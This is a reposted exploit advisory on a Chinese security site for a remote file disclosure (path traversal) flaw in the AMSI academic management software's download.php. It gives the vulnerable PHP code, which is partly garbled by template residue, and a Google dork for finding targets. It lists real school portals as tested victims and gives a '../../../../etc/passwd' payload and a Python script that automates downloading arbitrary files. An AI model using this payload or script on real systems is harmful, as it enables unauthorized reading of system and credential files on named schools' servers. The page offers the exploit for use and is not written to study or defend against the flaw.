首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AMSI 3.20.47 Build 37 File Disclosure
来源:http://h4x0resec.blogspot.com 作者:KnocKout 发布时间:2014-12-25  
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \
                        \_____  \  |    __)_ /    \  \/  
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/           
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Exploit Developed by : B3mB4m
[~] HomePage :  http://h4x0resec.blogspot.com
[~] Guzel Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, 
                      DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : AMSI ( Academia management solutions international )
|~Affected Version : v3.20.47 build 37
|~Software  : http://amsi.ae - http://iconnect.ae
|~RISK : Medium
|~Google Keyword/Dork :  inurl:"?load=news/search_news"
|~Tested On : [L] Kali Linux \ [R] example sites
####################INFO################################
makes it possible to read all the files from the local base.
 #######################################################
 
### Error Line in 'download.php' ## 
 
..
    $path   =   str_replace('/download.php?file=','',
___FCKpd___0
SERVER['REQUEST_URI']); // $path =
___FCKpd___0
GET['file']; header("Content-Description: File Transfer"); header("Content-Type: application/force-download"); //header("Content-Disposition: attachment; filename=" . basename($path . $uri[1])); header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" ); @readfile($path); .. ######################################################## Example and tested on; http://portal.iconnect.ae/ http://demo.iconnect.ae/ http://barsha.almawakeb.sch.ae/ http://portal.naischool.ae/ http://portal.ias-dubai.ae/ http://portal.madarschool.ae/ http://portal.isas.sch.ae/ http://portal.alsanawbarschool.com/ http://fia.fischools.com/ http://portal.ajyal.sch.ae/ http://portal.arabunityschool.com/ http://alnashaa.sch.ae/ http://portal.aaess.com/ ############################################################ Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd ############################################################ =========Automatic File Source Downloader Exploit ======== ##################### exploit.py ############################## # Coded by b3mb4m import random import os import urllib class B3mB4m(object): def example(self): print """ How to use ? Website: http://VICTIM.com Path : /download.php?file=../../../../etc/passwd """ def exploit(self): ask = raw_input("Website :") uz = raw_input("Path : ") #ask = "http://alnashaa.sch.ae" #uz = "/download.php?file=../../../../etc/passwd" uniq = str(random.randrange(1,1000+1))+".txt" filee = ask+uz try: urllib.urlretrieve(filee, uniq); print "\t\nDownload complate ! " os.startfile(uniq) except: B3mB4m().example() if __name__ == '__main__': B3mB4m().exploit()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Phase botnet blind SQL injecti
·WordPress Themes download.php
·GParted 0.14.1 - OS Command Ex
·WhatsApp <= 2.11.476 - Remote
·jetAudio 8.1.3 Basic (mp3) - C
·jetAudio 8.1.3.2200 Crash Proo
·NotePad++ v6.6.9 Buffer Overfl
·Maxthon Browser Address Bar Sp
·Lotus Mail Encryption Server (
·Desktop Linux Password Stealer
·Varnish Cache CLI Interface Re
·ProjectSend Arbitrary File Upl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved